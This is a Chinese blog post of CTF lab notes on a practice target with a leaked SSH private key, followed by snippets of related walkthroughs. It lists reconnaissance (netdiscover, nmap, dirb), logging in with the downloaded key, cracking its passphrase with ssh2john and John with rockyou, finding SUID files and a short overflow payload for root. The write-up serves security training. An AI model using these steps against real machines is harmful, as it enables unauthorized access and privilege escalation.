CTF靶机渗透笔记——SSH私钥泄露

最新推荐文章于 2022-10-05 20:41:22 发布
最新推荐文章于 2022-10-05 20:41:22 发布
阅读量560 收藏 1
点赞数 2
分类专栏: 学习笔记 文章标签: linux 安全 ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45883223/article/details/107342080
版权

1.IP发现,ARP侦查工具

netdiscover -r 192.168.0.0/16

2.端口扫描,版本检测,关注开放http服务的大于1024的端口

nmap -sV 192.168.x.x

3.扫描此端口的目录和隐藏文件

dirb http://192.168.x.x:xxxx/

4.打开敏感目录如:robots.txt,再打开里面Disallow的目录发现第一个flag
5.打开.ssh,发现存在私钥泄露,下载私钥和认证关键字的文件
6.打开认证关键字文件在最后发现了私钥的用户名
7.赋予私钥文件读写权限

chmod 600 私钥文件名

8.使用ssh命令,利用私钥对靶机进行远程登录

ssh -i 私钥文件名 私钥用户名@192.168.x.x

9.用ssh2john和zcat解出私钥文件的密码
10.用ssh2john把私钥信息转换成john可识别的信息

ssh2john.py 私钥文件名 > 转换后的文件名

11 --pipe: 批量读取,允许规则的单词表模式 , --rules: 为单词表模式启用单词修改规则

zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules 转换后的文件名

12 远程登录成功
13 访问根目录root

cd /root

14 发现无权限打开目录下的flag.txt,需要获取root权限
15 查找能够执行的文件

find / -perm -4000 2>/dev/null

find -perm: 根据文件的权限来查找文件
/: 从根目录开始查找
4000: suid
2>/dev/null: 将错误信息重定向到null文件中,用于防止错误信息

16 发现有一个.c文件是在root目录下,cat之后拿到了第二个flag,看源码发现是一个简单的pwn题,payload如下:

SimonAAAAAAAAAAAAAAA/bin/sh

17 成功提权,cat flag.txt,拿到第三个flag

WustHandy
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF训练之现学现卖--SSH私钥泄露-附件资源
03-02
CTF训练之现学现卖--SSH私钥泄露-附件资源
CTF训练笔记(一)- SSH私钥泄露
morrino的博客
01-07 1890
本文作为CTF训练笔记系列的第一章,详细描述了搭建环境时如何配置网络。 总结:细节非常重要,flag往往会藏在意想不到的地方,不要放过任何可疑文件,根据提示逐步挖掘所需信息。[CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
SSH服务的渗透测试
小锤队长的博客
10-05 3295
目录 一,ssh私钥泄露 充电站: 二,ssh 服务测试(暴力破解) 充电站: 一,ssh私钥泄露 靶场:192.168.11.166 1,信息嗅探 对于一个给定的ip得知的靶场机器,我们需要用对其进行扫描,探测开放的服务。(渗透其实是针对服务的漏洞进行探测,然后对应的数据包发送,获取机器的最高权限) nmap -sV 192.168.11.166 //挖掘开放服务...
vulnhub私钥泄露实战
qq_23347209的博客
05-27 257
文章目录环境准备一、信息搜集二、ssh私钥登录三、john破解ssh秘钥信息四、提权 环境准备 本次环境使用的是vulnhub靶场里面的covfefe 靶场下载地址:https://www.vulnhub.com/entry/covfefe-1,199/ 靶机:192.168.0.103 攻击机:parrot 192.168.146.129 一、信息搜集 nmap扫描靶机 nmap -sV 192.168.0.103 -sV是服务器指纹识别 发现80端口和22号的ssh服务,以及31337端口开
CTF自学笔记
u011005040的博客
06-21 2054
CTF自学笔记第一章:课程介绍与环境搭建1.课程介绍2.环境搭建第二章:CTF训练 SSH服务1.CTF-SSH私钥泄露信息探测分析探测结果探测大端口的信息 第一章:课程介绍与环境搭建 1.课程介绍 CTF比较中涉及内容比较复杂,我们要利用所有可以利用的资源获取flag。 2.环境搭建 安装软件:(都是数据库软件) vmware workstation 14 Virtual box 测试靶场网络环境: 1.使用 netdiscover -r ip/netmask 嗅探靶场IP (例:netdiscove
密码破解工具John the Ripper使用说明
anzada2048的博客
06-09 2927
John the Ripper John 包描述 John the Ripper 既功能丰富又运行快速。 它在一个程序中结合了几种破解模式,并且可以根据您的特定需求进行全面地配置(你甚至可以使用支持C的子集的内置编译器来设计一个自定义的破解模式)。 此外,John可以使用几种不同的平台,使您能够在任何地方使用相同的破解方法(您甚至可以继续进行已经在另一个平台上启动的破解会话)。 革新的是...
CTF渗透训练环境(镜像,视频,虚拟机)
最新发布
12-26
靶机镜像,教学视频(SSH私钥泄露SSH渗透root主机、SMB服务信息泄露、FTP服务后门利用、Sql-GET参数注入、Sql-POST参数之HTTP报文注入、Sql-X-Forwarded-For参数注入、SSI注入、路径遍历、暴力破解、命令执行、...
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
CTF6靶机实战.zip
05-25
CTF6靶机实战可能是模拟了一系列的安全挑战,参赛者需要通过分析、渗透和利用这些漏洞来完成任务。 文件上传漏洞是常见的Web安全问题之一。在这个实战中,提供了“shell.php”文件,这可能是一个恶意的PHP后门,...
中职网络安全2022江西省B-2:应用服务漏洞扫描与利用 ssh私钥泄露
FRANXX_02的博客
10-05 479
中职网络安全2022湖南省B-4任务四:应用服务漏洞扫描与利用 ssh私钥泄露
SSH私钥泄露
panda.
06-26 1424
1、使用命令nmap探测目标靶机的服务版本信息,将需要使用的参数作为FLAG进行提交;flag:sV2、通过上述端口访问靶机系统并探测隐藏的页面,将找到的敏感文件、目录名作为FLAG(形式:[敏感文件或目录1,敏感文件或目录2…,敏感文件或目录n])提交;flag:[ssh,robots,txt]3、通过上述敏感文件或目录下载可利用的私钥和认证关键字文件,将私钥文件名和认证关键字文件名作为FLAG(形式:[私钥文件名,认证关键字文件名])进行提交;flag:[id_rsa,authorized_keys]4
我要偷偷的学渗透,然后惊讶所有人(ssh服务渗透)
qq_20765511的博客
03-10 4647
准备需要的靶机 这次也是ssh服务的靶机,有需要或者感兴趣的家人们可以私信我,放心没有什么广告收费什么的,都是免费的 kali IP 192.168.43.105 靶机 IP:192.168.43.59 我之前的文章有怎么教获取靶机的IP 渗透第一步,先扫描信息 这里使用 nmap -sV IP 开放的服务和服务信息 nmap -sV 192.168.43.59 这里开放了三个端口,其中有80端口,可以去看看网址上有什么信息 这里可以看到这可能是用户名,可以先记着 随后在来深入的扫描一下 dirb
CTF-SSH私钥泄露
zhangpeng999123的博客
05-29 494
环境 Kali ip 192.168.1.109 SSH靶机ip 192.168.1.5 0x01信息探测 渗透其实是针对服务的漏洞检测,然后进行对应的数据包发送,获取机器的最高权限 nmap -sV 192.168.1.5 挖掘开放信息 分析探测结果 每一个服务对应计算机的一个端口,用来进行通信。常用的端口0~1023端口,在扫描结果中...
使用john破解密码
嘟的博客
10-26 3712
title: 使用john破解密码 tags: 密码破解 categories: 渗透测试 john Created directory: /root/.john John the Ripper password cracker, version 1.8.0.6-jumbo-1-bleeding [linux-x86-64-avx] Copyright (c) 1996-2015 by Sol...
网络攻防之ssh篇(穿插ctf的web例题)
qq_62097048的博客
07-08 1287
对于ssh进行的相关操作,有ctf的web例题
CTF夺旗-SSH私钥泄露-靶机渗透实战
居上
11-22 1035
CTF-SSH私钥泄露环境介绍信息收集扫描同网段下的存活主机访问开放的端口查看源代码扫描下当前页面的目录访问robots.txt访问没有扫描到的taxes访问ssh尝试登陆一下转换信息利用字典解密isacrack信息继续登陆查找具有root权限的文件 靶机链接 https://pan.baidu.com/s/15NW4AUBRRe6Y9-uRwHbC4g 提取码:6666 环境介绍 攻击机—IP地址:192.168.36.128 靶机—IP地址:未知(模拟真实攻防,所以未给出IP地址) Tips:两台
CTFSSH私钥泄露
D1stiny的博客
05-18 888
打开靶机,如图,并不知道密码,所以无法登陆 打开kali,使用netdiscover命令 netdiscover -r 你的ip/24 命令来探测靶机,比如你kali的IP是192.168.153.54,那么输入netdiscover -r 192.168.153.54/24注意的24代表探索IP的D段,表示子网位数,即子网掩码为255.255.255.0,转成二进制为:11111111 11111111 11111111 00000000,有24个1,如果24改成16,就可以探索IP的C段了,改成8,就
ctf训练 ssh私钥泄露
MIGENGKING的博客
06-02 1713
1-2 环境搭建 ssh私钥泄露是要在VM虚拟机中进行的。首先安装好VM虚拟机(我的另一个博客详细介绍VM的安装) (1)打开虚拟机和打开ssh私钥泄露靶场 并且本虚拟机和靶场的网络连接都要相同 (2)接下来打开本虚拟机的终端,并找到自己虚拟机的IP(是虚拟机的IP地址)在终端上输入“ifconfig”这个是找虚拟机的ip地址代码,然后找到自己虚拟机的IP地址,如图: (3)接下来我们使用...
SSL中,公钥、私钥、证书的后缀名都是些啥?
热门推荐
edmond999的专栏
04-19 1万+
今天做这么一个事,centos服务器,tomcat8+nginx1.6,现在要在上面运行cas4.0。所以需要配ssl,然后找教程,了解到,需要把tomcat和nginx的ssl都配置好。到这里就晕了,tomcat配ssl需要一个.keystore文件,nginx则需要配一个.crt和一个.key的文件。按照教程使用keytool生成了.keystore文件,然后我需要通过.keystore导出一...
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。 一、Vulnhub简介 Vulnhub是一个开源的渗透测试平台,提供了多种类型的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值